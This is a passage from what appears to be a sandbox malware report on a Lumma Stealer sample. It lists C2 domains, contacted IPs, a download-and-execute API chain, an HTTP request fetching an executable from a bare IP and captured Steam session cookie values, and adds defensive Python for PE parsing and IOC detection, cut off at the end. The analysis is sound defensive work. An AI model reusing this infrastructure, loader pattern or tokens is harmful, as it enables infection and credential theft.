    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh | 2_2_021A2F87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then test esi, esi | 2_2_0219CC07
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then jmp eax | 2_2_021A1C3E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_0216AC99
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0218ECC9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebx, eax | 2_2_02165D17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebp, eax | 2_2_02165D17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ecx, eax | 2_2_02176D15
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h] | 2_2_02185D57
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_0218BD67
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_0217AD91
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0217BD88
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0218EDC6

    Networking

    Source: Network traffic | Suricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.5:55144 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.5:65028 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.5:52066 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.5:61207 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.5:65437 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.5:59972 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.5:55763 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.5:57954 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.5:63165 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49706 -> 104.102.49.254:443
    Source: Malware configuration extractor | URLs: soundtappysk.shop
    Source: Malware configuration extractor | URLs: apporholis.shop
    Source: Malware configuration extractor | URLs: handscreamny.shop
    Source: Malware configuration extractor | URLs: chipdonkeruz.shop
    Source: Malware configuration extractor | URLs: skidjazzyric.click
    Source: Malware configuration extractor | URLs: femalsabler.shop
    Source: Malware configuration extractor | URLs: crowdwarek.shop
    Source: Malware configuration extractor | URLs: versersleep.shop
    Source: Malware configuration extractor | URLs: robinsharez.shop
    Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK
      Date: Sun, 12 Jan 2025 16:52:02 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Sun, 12 Jan 2025 16:45:01 GMT
      ETag: "62a00-62b850c908464"
      Accept-Ranges: bytes
      Content-Length: 403968
      Content-Type: application/x-msdos-program
      Data Raw (the first 0x2f0 bytes of the report's dump, grouped by structure; the dump continues with zero padding and is cut off mid-byte in the report):
        0000: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   DOS header
        0010: b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
        0020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        0030: 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00   e_lfanew = 0xe0
        0040: 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68   DOS stub, "This program cannot be run in DOS mode."
        0050: 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
        0060: 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
        0070: 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
        0080: ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7   Rich header ("DanS" XORed with key a8 df 97 e7)
        0090: b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7
        00a0: b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7
        00b0: a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7
        00c0: b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7
        00d0: 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00   "Rich" + key
        00e0: 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00   PE\0\0; Machine 0x014c (i386); 7 sections; TimeDateStamp 0x6695fdf9
        00f0: 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00   SizeOfOptionalHeader 0xe0; Characteristics 0x0103 (relocs stripped, executable, 32-bit); Magic 0x10b (PE32); linker 9.0; SizeOfCode 0x43600
        0100: 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00   SizeOfInitializedData 0x87000; AddressOfEntryPoint 0x14b7; BaseOfCode 0x1000
        0110: 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00   BaseOfData 0x45000; ImageBase 0x400000; SectionAlignment 0x1000; FileAlignment 0x200
        0120: 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00   OS and subsystem version 5.0
        0130: 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81   SizeOfImage 0xcf000; SizeOfHeaders 0x400; CheckSum 0x71702; Subsystem 2 (GUI); DllCharacteristics 0x8100 (NX compatible, no DYNAMIC_BASE)
        0140: 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00   stack and heap reserve 0x100000, commit 0x1000
        0150: 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00   NumberOfRvaAndSizes 0x10; export directory empty
        0160: cc 69 04 00 28 00 00 00 00 80 0b 00 10 69 01 00   import directory RVA 0x469cc size 0x28; resource directory RVA 0xb8000 size 0x16910
        0170: 72 x 00                                           exception through bound-import directories empty
        01b8: 00 50 04 00 80 01 00 00                           IAT RVA 0x45000 size 0x180
        01c0: 24 x 00                                           delay-import, CLR and reserved directories empty
        01d8: 2e 74 65 78 74 00 00 00 ac 34 04 00 00 10 00 00 00 36 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60   .text  VirtualSize 0x434ac RVA 0x1000 raw 0x43600 at 0x400; 0x60000020 (CODE, EXECUTE, READ)
        0200: 2e 72 64 61 74 61 00 00 56 22 00 00 00 50 04 00 00 24 00 00 00 3a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40   .rdata VirtualSize 0x2256 RVA 0x45000 raw 0x2400 at 0x43a00; 0x40000040 (INITIALIZED_DATA, READ)
        0228: 2e 64 61 74 61 00 00 00 08 7c 06 00 00 80 04 00 00 16 00 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0   .data  VirtualSize 0x67c08 RVA 0x48000 raw 0x1600 at 0x45e00; 0xc0000040 (INITIALIZED_DATA, READ, WRITE)
        0250: 2e 6e 6f 73 75 00 00 00 e5 53 00 00 00 00 0b 00 00 48 00 00 00 74 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0   .nosu  VirtualSize 0x53e5 RVA 0xb0000 raw 0x4800 at 0x47400; 0xc0000040
        0278: 2e 6d 75 77 61 76 00 00 5a 01 00 00 00 60 0b 00 00 02 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0   .muwav VirtualSize 0x15a RVA 0xb6000 raw 0x200 at 0x4bc00; 0xc0000040
        02a0: 2e 72 6f 78 61 68 00 00 0c 00 00 00 00 70 0b 00 00 02 00 00 00 be 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40   .roxah VirtualSize 0xc RVA 0xb7000 raw 0x200 at 0x4be00; 0x40000040
        02c8: 2e 72 73 72 63 00 00 00 10 69 01 00 00 80 0b 00 00 6a 01 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40   .rsrc  VirtualSize 0x16910 RVA 0xb8000 raw 0x16a00 at 0x4c000; 0x40000040
        02f0: 00 ... (zero padding; the report's dump is cut off)
      Decoded: a PE32 executable for x86 with a fixed image base (relocations stripped, no DYNAMIC_BASE) and seven sections, three of them with non-standard names (.nosu, .muwav, .roxah). The last section ends at file offset 0x4c000 + 0x16a00 = 0x62a00 = 403968 bytes, which matches Content-Length and the first field of the ETag (62a00, Apache's size field in hex). The .data section declares 0x67c08 bytes of virtual size but only 0x1600 bytes on disk.
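As an added example, not part of the Joe Sandbox report, the header bytes in the Data Raw dump above can be parsed with a short Python script to confirm what the response delivered: a PE32 image with seven sections, three of them with non-standard names, whose section table accounts for exactly the 403968 bytes announced by Content-Length. The hex is transcribed from the dump, with its runs of zero bytes written as bytes(n). Pairing this response with the report's GET /ScreenUpdateSync.exe request is an inference from the two entries, not something the report states explicitly; the parser only handles PE32 (Magic 0x10b), which is what this header is.

```python
import struct
from dataclasses import dataclass
from datetime import datetime, timezone

# First 0x2f0 bytes of the captured response body, transcribed from the report's
# "Data Raw" hex: DOS header and stub, Rich header, PE signature, COFF header,
# PE32 optional header and seven section headers.  Zero runs written as bytes(n).
HEADER = bytes.fromhex(
    "4d5a900003000000 04000000ffff0000 b800000000000000 4000000000000000"
    "00000000000000000000000000000000 000000000000000000000000e0000000"
    "0e1fba0e00b409cd21b8014ccd215468 69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320 6d6f64652e0d0d0a2400000000000000"
    "ecbef9b4a8df97e7a8df97e7a8df97e7 b68d13e789df97e7b68d02e7bcdf97e7"
    "b68d14e7c4df97e78f19ece7abdf97e7 a8df96e7d9df97e7b68d1de7a9df97e7"
    "b68d03e7a9df97e7b68d06e7a9df97e7 52696368a8df97e70000000000000000"
    "504500004c010700f9fd956600000000 00000000e00003010b01090000360400"
    "0070080000000000b714000000100000 00500400000040000010000000020000"
    "05000000000000000500000000000000 00f00c00000400000217070002000081"
    "00001000001000000000100000100000 00000000100000000000000000000000"
    "cc6904002800000000800b0010690100"
) + bytes(72) + bytes.fromhex("0050040080010000") + bytes(24) + bytes.fromhex(
    # name             VirtSize VirtAddr RawSize  RawPtr   reloc/line ptrs+counts   Characteristics
    "2e74657874000000 ac340400 00100000 00360400 00040000 000000000000000000000000 20000060"
    "2e72646174610000 56220000 00500400 00240000 003a0400 000000000000000000000000 40000040"
    "2e64617461000000 087c0600 00800400 00160000 005e0400 000000000000000000000000 400000c0"
    "2e6e6f7375000000 e5530000 00000b00 00480000 00740400 000000000000000000000000 400000c0"
    "2e6d757761760000 5a010000 00600b00 00020000 00bc0400 000000000000000000000000 400000c0"
    "2e726f7861680000 0c000000 00700b00 00020000 00be0400 000000000000000000000000 40000040"
    "2e72737263000000 10690100 00800b00 006a0100 00c00400 000000000000000000000000 40000040"
)

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".bss", ".tls", ".pdata"}
SCN_CODE, SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20, 0x20000000, 0x40000000, 0x80000000


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int

    def contains_rva(self, rva: int) -> bool:
        end = self.virtual_address + max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < end


def parse_pe(data: bytes) -> dict:
    """Parse the DOS header, COFF header, PE32 optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    size_of_image, = struct.unpack_from("<I", data, opt + 56)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rsize, rptr = struct.unpack_from("<IIII", data, off + 8)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append(Section(name, vsize, vaddr, rsize, rptr, chars))
    return {"machine": machine, "number_of_sections": nsec,
            "timestamp": datetime.fromtimestamp(stamp, timezone.utc),
            "entry_point": entry, "image_base": image_base,
            "size_of_image": size_of_image, "sections": sections}


def entry_section(info: dict):
    return next((s for s in info["sections"] if s.contains_rva(info["entry_point"])), None)


def file_size_from_sections(info: dict) -> int:
    """File offset where the last raw section ends; compare with Content-Length."""
    return max(s.raw_pointer + s.raw_size for s in info["sections"])


def summarize(info: dict) -> dict:
    secs, entry = info["sections"], entry_section(info)
    return {
        "nonstandard_sections": [s.name for s in secs if s.name not in STANDARD_SECTIONS],
        "rwx_sections": [s.name for s in secs
                         if s.characteristics & SCN_WRITE and s.characteristics & SCN_EXECUTE],
        "entry_section": entry.name if entry else None,
        "entry_in_code": bool(entry and entry.characteristics & SCN_CODE),
        "declared_file_size": file_size_from_sections(info),
    }


if __name__ == "__main__":
    info = parse_pe(HEADER)
    print(f"machine=0x{info['machine']:x} sections={info['number_of_sections']} "
          f"linked={info['timestamp']:%Y-%m-%d} entry=0x{info['entry_point']:x}")
    for s in info["sections"]:
        print(f"  {s.name:<7} rva=0x{s.virtual_address:06x} vsize=0x{s.virtual_size:06x} "
              f"raw=0x{s.raw_size:06x}@0x{s.raw_pointer:06x} flags=0x{s.characteristics:08x}")
    print(summarize(info))
```

The declared file size is the check worth keeping: a section table that claims more bytes than the body delivered means a truncated download, while one that claims fewer means trailing data (an overlay) that deserves a separate look. Here the two agree to the byte.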
    Source: Joe Sandbox View; IP Address: 172.67.179.207
    Source: Joe Sandbox View; IP Address: 104.102.49.254
    Source: Joe Sandbox View; IP Address: 176.113.115.19
    Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.102.49.254:443
    Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.19:80
    Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 172.67.179.207:443
    Source: global traffic; HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Host: steamcommunity.com
    Source: unknown; TCP traffic detected without corresponding DNS query: 176.113.115.19 (this entry is repeated 50 times in the report, one per connection; the sample reaches this host by hard-coded IP address, so no DNS lookup precedes the traffic)
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe; Code function: 0_2_004029EA InternetOpenW, InternetOpenUrlW, GetTempPathW, GetTempFileNameW, CreateFileW, InternetReadFile, WriteFile, CloseHandle, CloseHandle, ShellExecuteExW, WaitForSingleObject, CloseHandle, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle, 0_2_004029EA
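The API chain in the entry above (InternetOpenUrlW and InternetReadFile to fetch a URL, GetTempPathW, GetTempFileNameW, CreateFileW and WriteFile to drop it, ShellExecuteExW to run it, WaitForSingleObject to wait for it) is a plain download-and-execute loader, and EB86.tmp.exe, the second process the report dumps memory from, is presumably the file it dropped. As an added example, not part of the report, the following Python pairs a file write into a Temp directory with a later process start of that same file by the writer, which is how this chain shows up in endpoint telemetry. The records are constructed in the shape of Sysmon event 11 (FileCreate) and event 1 (ProcessCreate); the image names follow the report, while timestamps, PIDs, the Temp path, the benign control records and the GetTempFileName-style name pattern are assumptions.

```python
import re
from datetime import datetime, timedelta

# Lower-cased path fragments treated as Temp directories (assumed list).
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
# Assumed generalisation of the observed name EB86.tmp.exe: a GetTempFileName
# style hex name with .exe appended.
TEMP_NAME = re.compile(r"^[0-9a-f]{1,4}\.tmp\.exe$", re.I)
WINDOW = timedelta(seconds=60)

# Constructed telemetry.  id 11 = FileCreate (pid wrote target), id 1 =
# ProcessCreate (image started by parent with ppid).
EVENTS = [
    {"id": 11, "t": "2025-01-12T16:52:03", "pid": 4120,
     "image": r"C:\Users\user\Desktop\L7GNkeVm5e.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\EB86.tmp.exe"},
    {"id": 1, "t": "2025-01-12T16:52:04", "pid": 5208, "ppid": 4120,
     "image": r"C:\Users\user\AppData\Local\Temp\EB86.tmp.exe",
     "parent": r"C:\Users\user\Desktop\L7GNkeVm5e.exe"},
    # Benign control: a setup program writes a log to Temp and starts a helper
    # from its own install directory.  Must not fire.
    {"id": 11, "t": "2025-01-12T17:10:00", "pid": 6000,
     "image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\vendor_log.txt"},
    {"id": 1, "t": "2025-01-12T17:10:01", "pid": 6011, "ppid": 6000,
     "image": r"C:\Program Files\Vendor\helper.exe",
     "parent": r"C:\Program Files\Vendor\setup.exe"},
]


def in_temp(path: str) -> bool:
    return any(d in path.lower() for d in TEMP_DIRS)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def detect(events):
    """Return (rule, detail) findings.

    drop_and_execute: a process starts an executable it wrote into Temp within
    WINDOW.  temp_name_exe: the started image has a GetTempFileName-style name.
    """
    findings = []
    written = {}  # (writer pid, lower-cased path) -> time of the write
    for ev in sorted(events, key=lambda e: e["t"]):
        t = datetime.fromisoformat(ev["t"])
        if ev["id"] == 11 and in_temp(ev["target"]):
            written[(ev["pid"], ev["target"].lower())] = t
        elif ev["id"] == 1:
            image = ev["image"]
            if in_temp(image):
                wrote = written.get((ev["ppid"], image.lower()))
                if wrote is not None and t - wrote <= WINDOW:
                    findings.append(("drop_and_execute",
                                     f"{basename(ev['parent'])} -> {image}"))
            if TEMP_NAME.match(basename(image)):
                findings.append(("temp_name_exe", image))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule:18} {detail}")
```

The pairing on writer PID is what keeps the rule quiet on installers: they write plenty into Temp, but the process they start is rarely the file they just wrote. The name pattern is a weaker, stand-alone signal and is reported separately so it can be tuned or dropped on its own.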
    Source: global traffic; HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1
      User-Agent: ShareScreen
      Host: post-to-me.com
    Source: global traffic; HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Host: steamcommunity.com
    Source: global traffic; HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1
      User-Agent: ShareScreen
      Host: 176.113.115.19
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory (the HTTP client's header-name table with response values, including the steamCountry and sessionid cookies, interleaved): iContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=cbc3a60c9f2906ff09a75258; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 12 Jan 2025 16:52:06 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlh equals www.youtube.com (Youtube)
    Source: global traffic; DNS traffic detected: DNS query: post-to-me.com
    Source: global traffic; DNS traffic detected: DNS query: skidjazzyric.click
    Source: global traffic; DNS traffic detected: DNS query: soundtappysk.shop
    Source: global traffic; DNS traffic detected: DNS query: femalsabler.shop
    Source: global traffic; DNS traffic detected: DNS query: apporholis.shop
    Source: global traffic; DNS traffic detected: DNS query: crowdwarek.shop
    Source: global traffic; DNS traffic detected: DNS query: versersleep.shop
    Source: global traffic; DNS traffic detected: DNS query: chipdonkeruz.shop
    Source: global traffic; DNS traffic detected: DNS query: handscreamny.shop
    Source: global traffic; DNS traffic detected: DNS query: robinsharez.shop
    Source: global traffic; DNS traffic detected: DNS query: steamcommunity.com
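The network entries above give four indicators a SOC can check in its own DNS, connection and proxy logs: the nine C2 domains the configuration extractor recovered (each also seen as a DNS query), the ShareScreen User-Agent on the downloader's two requests, an executable fetched from a bare IP address (GET /ScreenUpdateSync.exe with Host: 176.113.115.19), and connections to that address that no DNS query preceded, plus the Steam profile lookup that the ETPRO rule flags. As an added example, not Joe Sandbox code or part of this report, the following Python correlates constructed DNS, connection and HTTP records that mirror those entries. The DNS answer addresses are assumptions (the report lists the contacted IPs but does not say which name resolved to which), and example.com is a benign control record.

```python
import ipaddress
import re

# C2 domains recovered by the report's configuration extractor.
LUMMA_C2_DOMAINS = frozenset({
    "soundtappysk.shop", "apporholis.shop", "handscreamny.shop",
    "chipdonkeruz.shop", "skidjazzyric.click", "femalsabler.shop",
    "crowdwarek.shop", "versersleep.shop", "robinsharez.shop",
})
STEAM_PROFILE = re.compile(r"^/profiles/\d{17}$")

# Constructed records, in the order the sandbox saw the traffic.  "answers"
# values are assumed; the report does not state the name-to-IP mapping.
EVENTS = [
    {"kind": "dns", "qname": "post-to-me.com", "answers": ["172.67.179.207"]},
    {"kind": "http", "host": "post-to-me.com", "uri": "/track_prt.php?sub=0&cc=DE",
     "ua": "ShareScreen"},
    {"kind": "conn", "dst": "176.113.115.19", "dport": 80},
    {"kind": "http", "host": "176.113.115.19", "uri": "/ScreenUpdateSync.exe",
     "ua": "ShareScreen"},
    {"kind": "dns", "qname": "steamcommunity.com", "answers": ["104.102.49.254"]},
    {"kind": "conn", "dst": "104.102.49.254", "dport": 443},
    {"kind": "http", "host": "steamcommunity.com", "uri": "/profiles/76561199724331900",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
           "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"},
    {"kind": "dns", "qname": "skidjazzyric.click", "answers": []},
    {"kind": "dns", "qname": "crowdwarek.shop", "answers": []},
    {"kind": "dns", "qname": "example.com", "answers": ["93.184.216.34"]},  # benign control
]


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def matches_c2(name: str) -> bool:
    """True for a listed C2 domain or any subdomain of one."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in LUMMA_C2_DOMAINS)


def analyze(events):
    """Walk the records in order and return (rule, detail) findings."""
    findings = []
    resolved = set()  # addresses some earlier DNS answer returned
    for ev in events:
        if ev["kind"] == "dns":
            resolved.update(ev["answers"])
            if matches_c2(ev["qname"]):
                findings.append(("dns_c2_lookup", ev["qname"]))
        elif ev["kind"] == "conn":
            # Direct-to-IP connection: no name was resolved to this address first.
            if ev["dst"] not in resolved:
                findings.append(("conn_without_dns", ev["dst"]))
        elif ev["kind"] == "http":
            host, uri, ua = ev["host"], ev["uri"], ev["ua"]
            if not ua.startswith("Mozilla/"):
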